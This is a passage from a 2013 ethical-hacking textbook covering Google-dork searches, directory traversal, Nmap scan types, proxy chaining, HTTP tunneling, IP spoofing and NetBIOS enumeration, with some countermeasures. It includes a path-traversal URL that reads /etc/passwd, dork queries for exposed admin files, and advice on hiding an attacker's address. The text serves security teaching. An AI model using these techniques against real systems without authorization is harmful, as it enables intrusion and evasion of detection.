IIS 4.0 allintitle:Welcome to Windows NT 4.0 Option Pack

IIS 4.0 allintitle:Welcome to Internet Information Server

IIS 5.0 allintitle:Welcome to Windows 2000 Internet Services

IIS 6.0 allintitle:Welcome to Windows XP Server Internet

Services

Many Netscape allintitle:Netscape Enterprise Server Home Page

servers

Unknown allintitle:NetscapeFastTrack Server Home Page

Netscape server

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 62

 Ethical Hacking Part I

4.3.4. Traversal Techniques - The next technique we’ll examine is

known as traversal. Traversal in this context simply means to travel
across. Attackers use traversal techniques to expand a small “foothold”
into a larger compromise.

a. Directory Traversal

To illustrate how traversal might be helpful, consider a directory listing

that was found withintitle:index.ofinurl:“admin”, as shown in Figure 4.6

Figure 4.6: Traversal Example Found with index.of 36

In this example, our query brings us to a relative URL of

/admin/php/tour. If you look closely at the URL, you’ll notice an “admin”
directory two directory levels above our current location. If we were to
click the “parent directory” link, we would be taken up one directory, to
the “php” directory. Clicking the “parent directory” link from the “envr”
directory would take us to the “admin” directory, a potentially juicy
directory. This is very basic directory traversal. We could explore each
and every parent directory and each of the subdirectories, looking for
juicy stuff.

Alternatively, we could use a creative site search combined with an

inurlsearch to locate a specific file or term inside a specific subdirectory,

36
www.google.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 63
 Ethical Hacking Part I

such assite:anu.edu inurl:admin ws_ftp.log, for example. We could also

explore this directory structure by modifying the URL in the address bar.

Regardless of how we were to “walk” the directory tree, we would be

traversing outside the Google search, wandering around on the target
Web Server. This is basic traversal, specifically directory traversal.
Another simple example would be replacing the word admin with the
word student or public. Another more serious traversal technique could
allow an attacker to take advantage of software flaws to traverse to
directories outside the Web server directory tree. For example, if a Web
server is installed in the/var/www directory and public Web documents
are placed in /var/www/htdocs, by default any user attaching to the
Web server’s top level directory is really viewing files located in
/var/www/htdocs. Under normal circumstances, the Web server will not
allow Web users to view files above the/var/www/htdocs directory.

Now, let’s say a poorly coded third-party software product is installed on

the server that accepts directory names as arguments. A normal URL
used by this product might be
www.somesadsite.org/badcode.pl?page=/index.html.This URL would
instruct the badcode.pl program to “fetch” the file located at
/var/www/htdocs/index.html and display it to the user, perhaps with a
nifty header and footer attached. An attacker might attempt to take
advantage of this type of program by sending a URL such as
www.somesadsite.org/badcode.pl?page=../../../etc/passwd. If the
badcode.pl program is vulnerable to a directory traversal attack, it would
break out of the /var/www/htdocsdirectory, crawl up to the real root
directory of the server, dive down into the /etc directory, and “fetch” the
system password file, displaying it to the user with a nifty header and
footer attached!

Automated tools can do a much better job of locating these types of files
and vulnerabilities. If you’re a programmer, you will be very interested in
the Libwhisker Perl library, written and maintained by Rain Forest
Puppy(RFP) and available from www.wiretrip.net/rfp. Security Focus
wrote a great article onusing Libwhisker. That article is available from
www.securityfocus.com/infocus/1798. If you aren’t a programmer, RFP’s
Whisker tool, also available from the Wiretrip site, is excellent, as are
other tools based on Libwhisker, such as nikto, written by sullo@cirt.net,
which is said tobe updated even more than the Whisker program itself.

Another tool that performs file and directory mining is Wikto from
SensePost that can be downloaded
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 64
 Ethical Hacking Part I

atwww.sensepost.com/research/wikto.The advantage of Wikto is that it

does not suffer from false positives on Web sites that respond with
friendly 404 messages.
b. Incremental Substitution

Another technique similar to traversal is incremental substitution. This

technique involves replacing numbers in a URL in an attempt to find
directories or files that are hidden, or unlinked from other pages.
Remember that Google generally only locates files that are linked from
other pages, so if it’s not linked, Google won’t find it. As a simple
example, consider a document called exhc-1.xls, found with Google. You
could easily modify the URL for that document, changing the 1 to a 2,
making the filename exhc-2.xls. If the document is found, you have
successfully used the incremental substitution technique! In some cases
it might be simpler to use a Google query to find other similar files on the
site, but remember, not all files on the Web are in Google’s databases.
Use this technique only when you’re sure a simple query modification
won’t find the files first.

This technique does not apply only to filenames, but just about anything
that contains number in a URL, even parameters to scripts. Using this
technique to toy with parameters to scripts is beyond the scope of this
book, but if you’re interested in trying your hand at some simple file or
directory substitutions, scare up some test sites with queries such as
filetype:xls inurl:1.xls or intitle:index.of inurl:0001 or even an images
search for 1.jpg. Now use substitution to try to modify the numbers in
the URL to locate other files or directories that exist on the site. Here are
some examples:

■ /docs/bulletin/1.xls could be modified to /docs/bulletin/2.xls

■ /DigLib_thumbnail/spmg/hel/0001/H/ could be changed to
/DigLib_thumbnail/spmg/hel/0002/H/
■ /gallery/wel008-1.jpg could be modified to /gallery/wel008-2.jpg

c. Extension Walking

We have already discussed file extensions and how the file type operator
can be used to locate files with specific file extensions. For example, we
could easily search for HTM files with query such as filetype: HTM1. Once
you’ve located HTM files, you could apply the substitution technique to
find files with the same file name and different extension. For example, if
you found /docs/index.htm, you could modify the URL to
/docs/index.asp to try to locate anindex.asp file in the docs directory. If
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 65
 Ethical Hacking Part I

this seems somewhat pointless, rest assured, this is, in fact, rather

pointless. We can, however, make more intelligent substitutions.

Consider the directory listing shown in Figure4.7.This listing shows
evidence of a very common practice, the creation of backup copies of Web
pages.

Figure4.7.Backup Copies of Web Pages Are Very Common

4.4. Preventing Google Hacking Attacks

Remove all pages identified by Google hacking queries

i. Check if your website is vulnerable to attack with Acunetix

Web Vulnerability Scanner
Acunetix Web Vulnerability Scanner ensures website security by
automatically checking for SQL injection, Cross site scripting and
other vulnerabilities. It checks password strength on authentication
pages and automatically audits shopping carts, forms, dynamic
content and other web applications. As the scan is being completed,
the software produces detailed reports that pinpoint where
vulnerabilities exist. Take a product tour or download the evaluation
version.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 66

 Ethical Hacking Part I

ii. Scanning for XSS vulnerabilities with Acunetix WVS Free

Edition!
To check whether your website has cross site scripting vulnerabilities,
download the Free Edition from http://www.acunetix.com/cross-site-
scripting/scanner.htm. This version will scan any website / web
application for XSS vulnerabilities and it will also reveal all the
essential information related to it, such as the vulnerability location
and remediation techniques.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 67

 Ethical Hacking Part I

CHAPTER 5

SCANNING
Objective
5.1 Introduction of Scanning
5.2 Types of Scanning
5.3 Methodology of Scanning
5.4 Anonymizers
5.5 HTTP Tunneling
5.6 IP Spoofing

5.1. Introduction of Scanning

The process of proactively identifying vulnerabilities of computing

systems in a network in order to determine if and where a system can be
exploited and/or threatened. It is a computer program designed to map
systems and search for weaknesses in an application, computer or
network. While public servers are important for communication and data
transfer over the Internet, they open the door to potential security
breaches by threat agents, such as malicious hackers. Vulnerability
scanning employs software that seeks out security flaws based on a
database of known flaws, testing systems for the occurrence of these
flaws and generating a report of the findings that an individual or an
enterprise can use to tighten the network’s security.

During scanning, the hacker continues to gather information regarding

the network and its individual host systems. Data such as IP addresses,
operating system, services, and installed applications can help the
hacker decide which type of exploit to use in hacking a system. Scanning
is the process of locating systems that are alive and responding on the
network. Ethical hackers use it to identify target systems’ IP addresses.

5.2. Types of Scanning

Scanning Type Purpose

Port scanning Determines open ports and

services

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 68

 Ethical Hacking Part I

Network scanning IP addresses

Vulnerability scanning Presence of known

weaknesses

Scanning is used to determine whether a system is on the network and

available. Scanning tools are used to gather information about a system
such as IP addresses, the operating system, and services running on the
target computer. After the active and passive reconnaissance stages of
system hacking have been completed, scanning is performed.

5.2.1.Port scanning37

Port scanning can uncover a number of holes that a hacker could use
against you. Port Scanning is one of the most popular reconnaissance
techniques attackers use to discover services they can break into. Since
a port is a place where information goes into and out of a computer, port
scanning identifies open doors to a computer. Port scanning has
legitimate uses in managing networks, but port scanning also can be
malicious in nature if someone is looking for a weakened access point to
break into your computer. All machines connected to a Local Area
Network (LAN) or Internet run many services that listen at well-known
and not so well known ports. A port scan helps the attacker find which
ports are available (i.e., what service might be listing to a port).
Essentially, a port scan consists of sending a message to each port, one
at a time. The kind of response received indicates whether the port is
used and can therefore be probed further for weakness.

Port scanning is the process of identifying open and available TCP/IP

ports on a system. Port-scanning tools enable a hacker to learn about the
services available on a given system. Each service or application on a
machine is associated with a well-known port number. For example, a
port-scanning tool that identifies port 80 as open indicates a web server
is running on that system. Hackers need to be familiar with well-known
port numbers.

Note: On Windows systems, well-known port numbers are located in the

C:\windows\system32\drivers\etc\servicesfile. Services file is a hidden
file. To view it, show hidden files in Windows Explorer, double-click the

37
http://www.auditmypc.com/port-scanning.asp
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 69
 Ethical Hacking Part I

file, and open it with Notepad. You should know the well-known port
numbers for common applications; familiarize yourself with the port
numbers for FTP (21), Telnet (23), HTTP (80), SMTP (25), POP3 (110), and
HTTPS (443).

5.2.2.Network scanning38

Network scanning is a procedure for identifying active hosts on a

network, either to attack them or as a network security assessment.
Hosts are identified by their individual IP addresses. Network-scanning
tools attempt to identify all the Live or responding hosts on the network
and their corresponding IP addresses. Scanning procedures, such as
ping sweeps and port scans, return information about which IP
addresses map to live hosts that are active on the Internet and what
services they offer. Another scanning method, inverse mapping, returns
information about what IP addresses do not map to live hosts; this
enables an attacker to make assumptions about viable addresses.

Scanning is one of three components of intelligence gathering for an

attacker. In the foot printing phase, the attacker creates a profile of the
target organization, with information such as its domain name system
(DNS) and e-mail servers, and its IP address range. Most of this
information is available online. In the scanning phase, the attacker finds
information about the specific IP addresses that can be accessed over the
Internet, their operating systems, the system architecture, and the
services running on each computer.

5.2.3.Vulnerability scanning39

Vulnerability scanning is the process of proactively identifying the

vulnerabilities of computer systems on a network. Generally, a
vulnerability scanner first identifies the operating system and version
number, including service packs that may be installed. Then, the
vulnerability scanner identifies weaknesses or vulnerabilities in the
operating system. During the later attack phase, a hacker can exploit
those weaknesses in order to gain access to the system. An intrusion
detection system (IDS) or a sophisticated network security professional
with the proper tools can detect active port-scanning activity. Scanning
tools probe TCP/IP ports looking for open ports and IP addresses, and
these probes can be recognized by most security intrusion detection

38
http://searchmidmarketsecurity.techtarget.com/definition/network-scanning
39
books.google.co.in/books?isbn=8126511966
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 70
 Ethical Hacking Part I

tools. Network and vulnerability scanning can usually be detected as

well, because the scanner must interact with the target system over the
network.

5.3. Scanning Methodology40

This methodology is the process by which a hacker scans the network. It

ensures that no system or vulnerability is overlooked and that the hacker
gathers all necessary information to perform an attack. We’ll look at the
various stages of this scanning methodology throughout this book,
starting with the first three steps—checking for systems that are live and
for open ports and service identification the following section. These
methodologies are given below:

40Book: CEH Certified Ethical Hacker Study Guide

By Kimberly Graves
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 71
 Ethical Hacking Part I

Scanning methodology
Check for Live Systems

Check for Open Ports

Service Identification

Banner Grabbing /

OS Fingerprinting

Vulnerability Scanning

Draw Network Diagrams

of Vulnerable Hosts

Prepare Proxies

Attack

Figure 5.1: Scanning Methodology

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 72

 Ethical Hacking Part I

Check for Live Systems

A) Ping Sweep Techniques41

The scanning methodology starts with checking for systems that are live
on the network, meaning that they respond to probes or connection
requests. The simplest, although not necessarily the most accurate, way
to determine whether systems are live is to perform a ping sweep of the
IP address range. A ping sweep (also known as an ICMP sweep) is a basic
network scanning technique used to determine which of a range of IP
addresses map to live hosts (computers). Whereas a single ping will tell
you whether one specified host computer exists on the network, a ping
sweep consists of ICMP (Internet Control Message Protocol) ECHO
requests sent to multiple hosts. If a given address is live, it will return an
ICMP ECHO reply. Ping sweeps are among the older and slower methods
used to scan a network.
All systems that respond with a ping reply are considered live on the
network. Internet Control Message Protocol (ICMP) scanning is the
process of sending an ICMP request or ping to all hosts on the network to
determine which ones are up and responding to pings. A benefit of ICMP
scanning is that it can be run in parallel , meaning all system are
scanned at the same time; thus it can run quickly on an entire network.
Most hacking tools include a ping-sweep option, which essentially means
performing an ICMP request to every host on the network.

41
Book: CEH Certified Ethical Hacker Study Guide
By Kimberly Graves
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 73
 Ethical Hacking Part I

One considerable problem with this method is that personal firewall

software and network based firewalls can block a system from
responding to ping sweeps. Another problem is that the computer must
be on to be scanned.

B) Tools for Scanning the live Systems

Pinger, Friendly Pinger, and WS_Ping_Pro are all tools that perform ICMP
queries.

C) Detecting Ping Sweeps

Almost any IDS or intrusion prevention system (IPS) system will detect
and alert the security administrator to a ping sweep occurring on the
network. Most firewall and proxy servers block ping responses so a
hacker can’t accurately determine whether systems are available using a
ping sweep alone. More intense port scanning must be used if systems
don’t respond to a ping sweep. Just because a ping sweep doesn’t return
any active hosts on the network doesn’t mean they aren’t available—you
need to try an alternate method of identification. Remember, hacking
takes time, patience, and persistence.

5.3.1.Scanning Ports and Identifying Services

Checking for open ports is the second step in the scanning methodology.
Port scanning is the method used to check for open ports. The process of
port scanning involves probing each port on a host to determine which
ports are open. Port scanning generally yields more valuable information
than a ping sweep about the host and vulnerabilities on the system.
Service identification is the third step in the scanning methodology; it’s
usually performed using the same tools as port scanning. By identifying
open ports, a hacker can usually also identify the services associated
with that port number.

A) Scanning Port using Nmap Tool

i. Nmap Command Switches

Nmap is a free open source tool that quickly and efficiently performs
ping sweeps, port scanning, service identification, IP address
detection, and operating system detection. Nmap has the benefit of
scanning of large number of machines in a single session. It’s
supported by many operating systems, including UNIX, Windows, and
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 74
 Ethical Hacking Part I

42

Linux. The state of the port as determined by an Nmap scan can be

open, filtered, or unfiltered.
Open means that the target machine accepts incoming request on
that port.

Filtered means a firewall or network filter is screening the port and

preventing Nmap from discovering whether it’s open.

Unfiltered mean the port is determined to be closed, and no firewall or

filter is interfering with the Nmap requests.

Nmap support several types of scans as below:

ii. Nmap Scan Types

Nmap Scan Description

Type

TCP connect The attacker makes a full TCP connection to the

target system.

42
www.nmap.org
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 75
 Ethical Hacking Part I

XMAS tree The attacker checks for TCP services by sending

scan XMAS-tree packets, which are named as such
because all the “lights” are on meaning the FIN,
URGandPSH flags are set (the meaning of the flags
will be discussed later in this chapter.
SYN stealth This is also known as half-open scanning. The hacker
scan sends a SYN packet and receives a SYN-ACK back
from the server. It’s stealthy because a full TCP
connection isn’t opened.
Null scan This is an advanced scan that may be able to pass
through firewalls undetected or modified. Null scan
has all flags off or not set. It only works on UNIX
systems.
Windows This type of scan is similar to the ACK scan and can
scan also detect open ports.
ACK scan This type of scan is used to map out firewall rules.
ACK scan only works on UNIX.

Nmap has numerous command switches to perform different

types of scans.

The common command switches are listed below:

Nmap Command Scan Performed

-sT TCP connect scan

-sS SYN scan
-sF FIN scan
-sX XMAS tree scan
-sN Null scan
-sP Ping scan
-sU UDP scan
-sO Protocol scan
-sA ACK scan
-sW Windows scan
-sR RPC scan
-sL List / DNS scan
-sI Idle scan
-Po Don’t ping
-PT TCP ping
-PS SYN ping
-PI ICMP ping
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 76
 Ethical Hacking Part I

-PB TCP and ICMP ping

-PB ICMP timestamp
-PM ICMP netmask
-oN Normal output
-oX XML output
-oG Greppable output
-oA All output
-T Paranoid Serial scan; 300 sec between
scans
-T Sneaky Serial scan; 15 sec between
scans
-T Polite Serial scan; .4 sec between
scans
-T Normal Parallel scan

-T Aggressive Parallel scan, 300 sec

timeout, and 1.25 sec/probe
-T Insane Parallel scan, 75 sec timeout,
and .3 sec/probe

To perform an Nmap scan, at the Windows command prompt, type Nmap

IPaddress followed by any command switches used to perform specific
type of scans. For example, to scan the host with the IP address
192.168.0.1 using a TCP connects scan type, enter this command: Nmap
192.168.0.1 –sT

B) Port Scanning Advanced Techniques

SYN : A SYN or stealth scan is also called a half-open scan because it

doesn’t complete the TCP three-way handshake. The TCP/IP three-way
handshake will be covered in the next section. A hacker sends a SYN
packet to the target; if a SYN/ACK frame is received back, then it’s
assumed the target would complete the connect and the port is listening.
If a RST is received back from the target, then it’s assumed the port isn’t
active or is closed. The advantage of the SYN stealth scan is that fewer
IDS systems log this as an attack or connection attempt.

XMAS: Other techniques that have been used consist of XMAS scans
where all flags in the TCP packet are set. XMAS scans send a packet with
the FIN, URG, and PSH flags set. If the port is open, there is no response;
but if the post is closed, the target responds with a RST/ACK packet.
XMAS scans work only on target systems that follow the RFC 793

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 77

 Ethical Hacking Part I

implementation of TCP/IP and don’t work against any version of

Windows.

FIN : A FIN scan is similar to an XMAS scan but sends a packet with
just the FIN flag set. FIN scans receive the same response and have the
same limitations as XMAS scans. The typical TCP scan attempts to open
connections. Another technique sends erroneous packets at a port,
expecting that open listening ports will send back different error
messages than closed ports. The scanner sends a FIN packet, which
should close a connection that is open. Closed ports reply to a FIN
packet with a RST. Open ports, on the other hand, ignore the packet in
question. This is required TCP behavior.

If no service is listening at the target port, the operating system will

generate an error message. If a service is listening, the operating system
will silently drop the incoming packet. Therefore, silence indicates the
presence of a service at the port. However, since packets can be dropped
accidentally on the wire or blocked by firewalls, this isn't a very effective
scan.

NULL: NULL scans where none of the bits are set. A NULL scan is also
similar to XMAS and FIN in its limitations and response, but it just
sends a packet with no flags set.

IDLE: An IDLE scan uses a spoofed IP address to send a SYN packet to a

target. Depending on the response, the port can be determined to be
open or closed. IDLE scans determine port scan response by monitoring
IP header sequence numbers.

C) List TCP Communication Flag Types

TCP scan types are built on the TCP three-way handshake. TCP
connections require a three-way handshake before a connection can be
made and data transferred between the sender and receiver. 43

43
Book: CEH Certified Ethical Hacker Study Guide
By Kimberly Graves
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 78
 Ethical Hacking Part I

TCP three-way handshake

131.21.7.50:2567 SYN 214.21.4.1:80

131.21.7.50:2567 SYN/ACK 214.21.4.1:80

131.21.7.50:2567

131.21.7.50:2567 ACK 214.21.4.1:80

In order to complete the three-way handshake and make a successful

connection between two hosts, the sender must send a TCP packet with
the synchronize (SYN) bit set. Then, the receiving system responds with a
TCP packet with the synchronize (SYN) and acknowledge (ACK) bit set to
indicate the host is ready to receive data. The source system sends a
final packet with the acknowledge (ACK) bit set to indicate the connection
is complete and data is ready to be sent. Because TCP is a connection-
oriented protocol, a process for establishing a connection (three-way
handshake), restarting a failed connection, and finishing a connection is
part of the protocol. These protocol notifications are called flags. TCP
contains ACK, RST, SYN, URG, PSH, and FIN flags. The following list
identifies the function of the TCP flags:

 SYN—Synchronize  Initiates a connection between hosts.

 ACK—Acknowledge  Established connection between hosts.
 PSH—Push  System is forwarding buffered data.


URG—Urgent Data in packets must be processed quickly.
FIN—Finish  No more transmissions.
 RST—Reset  Resets the connection.

A hacker can attempt to bypass detection by using flags instead of

completing a normalcy connection. The TCP scan types are used by some
scanning tools to elicit response from a system by setting one or more
flags.44

44
Book: CEH Certified Ethical Hacker Study Guide
By Kimberly Graves
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 79
 Ethical Hacking Part I

TCP Scan Types

XMAS Scan Flags sent by hacker

XMAS scan All flags set (ACK, RST, SYN,

URG, PSH, FIN)
FIN scan FIN
NULL Scan No flags set
TCP connect / full-open scan SYN, then ACK
SYN scan / half-open scan SYN, then RST

D) Hacking Tools

i. IPEye is a TCP port scanner that can do SYN, FIN, Null, and XMAS
scans. It’s a command-line tool. IPEye probes the ports on a target
system and responds with closed, reject, drop, or open. Closed
means there is a computer on the other end, but it doesn’t listen at
the port. Reject means a firewall is rejecting (sending a reset back)
the connection to the port. Drop means a firewall is dropping
everything to the port, or there is no computer on the other end.
Open means some kind of service is listening at the port. These
responses help a hacker identify what type of system is
responding.

ii. IPSec Scan is a tool that can scan either a single IP address or a
range of addresses looking for systems that are IPSec enabled.

iii. Netscan Tools Pro 2000, Hping2, KingPing, icmpenum, and SNMP
Scanner are all scanning tools and can also be used to fingerprint
the operating system.

iv. Icmpenum uses not only ICMP Echo packets to probe networks,
but also ICMP Timestamp and ICMP Information packets.
Furthermore, it supports spoofing and sniffing for reply packets.
Icmpenum is great for scanning networks when the firewall blocks
ICMP Echo packets but fails to block Timestamp or Information
packets.

v. Hping2 is notable because it contains a host of other features

besides OS fingerprinting such as TCP, User Datagram Protocol
(UDP), ICMP, and raw-IP ping protocols, traceroute mode, and the
ability to send files between the source and target system.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 80

 Ethical Hacking Part I

vi. SNMP Scanner allows you to scan a range or list of hosts

performing ping, DNS, and Simple Network Management Protocol
(SNMP) queries.

vii. THC-Scan, Phonesweep, war dialer, and telesweep are all tools
that identify phone numbers and can dial a target to make a
connection with a computer modem. These tools generally work by
using a predetermined list of common usernames and passwords
in an attempt to gain access to the system. Most remote-access
dial-in connections aren’t secured with a password or use very
rudimentary security.

E. Port-Scan Countermeasures

Countermeasures are processes or tool sets used by security

administrators to detect and possibly thwart port scanning of hosts on
their network. The following list of countermeasures should be
implemented to prevent a hacker from acquiring information during a
port scan:

 Proper security architecture, such as implementation of IDS and

firewalls, should be followed.

 Ethical hackers use their tool set to test the scanning

countermeasures that have been implemented. Once a firewall is in
place, a port-scanning tool should be run against hosts on the
network to determine whether the firewall correctly detects and
stops the port scanning activity.

 The firewall should be able to detect the probes sent by port-

scanning tools. The firewall should carry out stateful inspections,
which means it examines the data of the packet and not just the
TCP header to determine whether the traffic is allowed to pass
through the firewall.

 Network IDS should be used to identify the OS-detection method

used by some common hackers tools, such as Nmap.

 Only needed ports should be kept open. The rest should be filtered
or blocked.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 81

 Ethical Hacking Part I

 The staff of the organization using the systems should be given

appropriate training on security awareness. They should also know
the various security policies they’re required to follow.

5.3.2.Banner Grabbing and OS Fingerprinting Techniques45

Banner grabbing and operating system identification—which can also be

defined as fingerprinting the TCP/IP stack—is the fourth step in the
scanning methodology. The process of fingerprinting allows the hacker to
identify particularly vulnerable or high value targets on the network.
Hackers are looking for the easiest way to gain access to a system or
network. Banner Grabbing is an enumeration technique used to find
information about computer systems on a network and the services
running its open ports. Administrators can use this to take inventory of
the systems and services on their network. An intruder however can use
banner grabbing in order to find network hosts that are running versions
of applications and operating systems with known exploits.

Banner grabbing is the process of opening a connection and reading the

banner or response sent by the application. Many e-mail, FTP, and web
servers will respond to a telnet connection with the name and version of
the software. The aids a hacker in fingerprinting the OS and application
software. For example, a Microsoft Exchange e-mail server would only be
installed on Windows OS.

A. Active stack fingerprinting is the most common form of

fingerprinting. It involves sending data to a system to see how the
system responds. It’s based on the fact that various operating
system vendors implement the TCP stack differently, and
responses will differ based on the operating system. The responses
are then compared to a database to determine the operating
system. Active stack fingerprinting is detectable because it
repeatedly attempts to connect with the same target system.

B. Passive stack fingerprinting is stealthier and involves examining

traffic on the network to determine the operating system. It uses
sniffing techniques instead of scanning techniques. Passive stack
fingerprinting usually goes undetected by an IDS or other security
system but is less accurate than active fingerprinting.

45
Book: CEH Certified Ethical Hacker Study Guide
By Kimberly Graves
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 82
 Ethical Hacking Part I

5.3.3.Drawing Network Diagrams of Vulnerable Hosts

Drawing a network diagram of vulnerable hosts—is a must for further

steps. Once you draw a network diagram it assists you to understand the
network structure which will help in attack phase. A number of network-
management tools can assist you with this step. Such tools are generally
used to manage network devices but can be turned against security
administrators by enterprising hackers.

SolarWinds Toolset, Queso, Harris Stat, and Cheops are all network-
management tools that can be used for operating system detection,
network diagram mapping, listing services running on a network,
generalized port scanning, and so on. These tools diagram entire
networks in a GUI interface including routers, servers, hosts and
firewalls. Most of these tools can discover IP addresses, host names,
services, operating systems, and version information.

Netcraft and HTTrack are tools that fingerprint an operating system.

Both are used to determine the OS and web-server software version
numbers. Netcraft is a website that periodically polls web servers to
determine the operating system version and the web-server software
version. Netcraft can provide useful information the hacker can use in
identifying vulnerabilities in the web server software. In addition, Netcraft
has an anti-phishing toolbar and web-server verification tool you can use
to make sure you’re using the actual web server rather than a spoofed
web server.

HTTrack arranges the original site’s relative link structure. You open a
page of the mirrored website in your browser, and then you can browse
the site from link to link as if you were viewing it online. HTTrack can
also update an existing mirrored site and resume interrupted downloads.

5.3.4.Proxy Servers Are Used in Launching an Attack

Preparing proxy servers is the last step in the CEH scanning

methodology. A proxy server is a computer that acts as an intermediary
between the hacker and the target computer. Using a proxy server can
allow a hacker to become anonymous on the network. The hacker first
makes a connection to the proxy server and then requests a connection
to the target computer via the existing connection to the proxy.
Essentially, the proxy requests access to the target computer not the
hacker’s computer. This lets hacker surf the web anonymously or
otherwise hides their attack.
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 83
 Ethical Hacking Part I

Hacking Tools

SocksChain is a tool that gives a hacker the ability to attack through a

chain of proxy servers. The main purpose of doing this is to hide the
hacker’s real IP address and therefore minimize the chance of detection.
When a hacker works through several proxy servers in series, it’s much
harder to locate the hacker. Tracking the attacker’s IP address through
the logs of several proxy servers is complex and tedious work. If one of
the proxy servers’ log files is lost or incomplete, the chain is broken, and
the hacker’s IP address remains anonymous.

5.4. How Anonymizers Works?46

Anonymizers are services that attempt to make web surfing anonymous

by utilizing a website that acts as a proxy server for the web client. The
first anonymizer software tool was developed by Anonymizer.com; it was
created in 1997 by Lance Cottrell. The anonymizer removes all the
identifying information from a user’s computers while the user surfs the
Internet, thereby ensuring the privacy of the user.

To visit a website anonymously, the hacker enters the website address

into the anonymizer software, and the anonymizer software makes the
request to the selected site. All requests and web pages are relayed
through the anonymizer site, making it difficult to track the actual
requester of the webpage. There is also lots of website that’s help to surf
anonymously. For this just type anonymous surfing on Google and you
will get the related site where you can able to maintain your privacy. For
more information refer following site:

http://www.guard-privacy-and-online-security.com/free-proxy-
anonymizers.html

5.5. HTTP Tunneling Techniques

HTTP Tunneling is a technique by which communications performed
using various network protocols are encapsulated using the HTTP
protocol, the network protocols in question usually belonging to the
TCP/IP family of protocols. The HTTP protocol therefore acts as a
wrapper for a covert channel that the network protocol being tunneled
uses to communicate.

46
Book: CEH Certified Ethical Hacker Study Guide
By Kimberly Graves
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 84
 Ethical Hacking Part I

The HTTP stream with its covert channel is termed an HTTP Tunnel.
HTTP Tunnel software consists of client-server HTTP Tunneling
applications that integrate with existing application software, permitting
them to be used in conditions of restricted network connectivity
including firewalled networks, networks behind proxy servers, and NATs.
A popular method of bypassing a firewall or IDS is to tunnel a blocked
protocol (such as SMTP) through an allowed protocol (such as HTTP).
Almost all IDS and firewalls act as a proxy between a client’s PC and the
Internet and pass only the traffic defined as being allowed. Most
companies allow HTTP traffic because it’s usually benign web access.
However, a hacker using a HTTP tunneling tool can subvert the proxy by
hiding potentially destructive protocols, such as IM or chat, within an
innocent-looking protocol packet.

Hacking Tools

HTTPort, Tunneld, and BackStealth are all tools to tunnel traffic though
HTTP. They allow the bypassing of an HTTP proxy, which blocks certain
protocols access to the Internet. These tools allow the following
potentially dangerous software protocols to be used from behind an HTTP

 E-mail
proxy:

 IRC
 ICQ
 News
 AIM
 FTP

5.6. IP Spoofing Techniques47

A hacker can spoof an IP address when scanning target systems to

minimize the chance of detection. One drawback of spoofing an IP
address is that a TCP session can’t be successfully completed. Source
routing lets an attacker specify the route that a packet takes through the
Internet. This can also minimize the chance of detection by bypassing
IDS and firewalls that may block or detect the attack. Source routing
uses a reply address in the IP header to return the packet to a spoofed
address instead of the attacker’s real address.

47
http://luizfirmino.blogspot.in/2011/07/identify-ip-spoofing-techniques.html
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 85
 Ethical Hacking Part I

To detect IP address spoofing, you can compare the time to live (TTL)
values: The attacker’s TTL will be different from the spoofed address’s
real TTL.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 86

 Ethical Hacking Part I

CHAPTER 6
ENUMERATION
Objective
6.1 Introduction of Enumeration
6.2 Steps of Enumeration
6.3 Tools for Enumeration
6.4 Null Sessions
6.5 SNMP Enumeration
6.6 Zone Transfer
6.7 Countermeasures

6.1. Introduction of Enumeration48

Enumeration occurs after scanning and is the process of gathering and
compiling usernames, machine names, network resources, shares, and
services. It also refers to actively querying or connecting to a target
system to acquire this information.

During the enumeration stage, the hacker connects to computers in the

target network and pokes around these systems to gain more
information. While the scanning phase might be compared to a knock on
the door or a turn of the doorknob to see if it is locked, enumeration
could be compared to entering an office and rifling through a file cabinet
or desk drawer for information. It is definitely more intrusive.

48
Book: CEH Certified Ethical Hacker Study Guide
By Kimberly Graves
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 87
 Ethical Hacking Part I

Many hacking tools are designed for scanning IP networks to locate

NetBIOS name information. For each responding host, the tools list IP
address, NetBIOS computer name, logged in username, and MAC
address information. On a Windows 2000 domain, the built-in tool net
view can be used for NetBIOS enumeration. To enumerate NetBIOS
names using the net view command, enter the following at the command
prompt:

net view / domain

nbtstat -A IP address

The net view command is a great example of a built-in enumeration tool.

net view is an extraordinarily simple command-line utility that will list
domains available on the network and then lay bare all machines in a
domain. Here‘s how to enumerate domains on the network using net
view:

C:\>net view /domain

Another great built-in tool is nbtstat, which calls up the NetBIOS Name
Table from a remote system. The Name Table contains a great deal of
information, as seen in the following example:

C:\>nbtstat -A 192.168.202.33

6.2. Steps of Enumeration49

Hackers need to be methodical in their approach to hacking. The

following steps are an example of those a hacker might perform in
preparation for hacking a target system:

1. Extract usernames using enumeration.

2. Gather information about the host using null sessions.
3. Perform Windows enumeration using the Superscan tool.
4. Acquire the user accounts using the tool GetAcct.
5. Perform SNMP port scanning.

49
Book: CEH Certified Ethical Hacker Study Guide By Kimberly Graves
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 88
 Ethical Hacking Part I

6.3. Tools for Enumeration

i. DumpSec is a NetBIOS enumeration tool. It connects to the target

system as a null user with the net use command. It then
enumerates users, groups, NTFS permissions, and file ownership
information.

ii. Hyena is a tool that enumerates NetBIOS shares and additionally

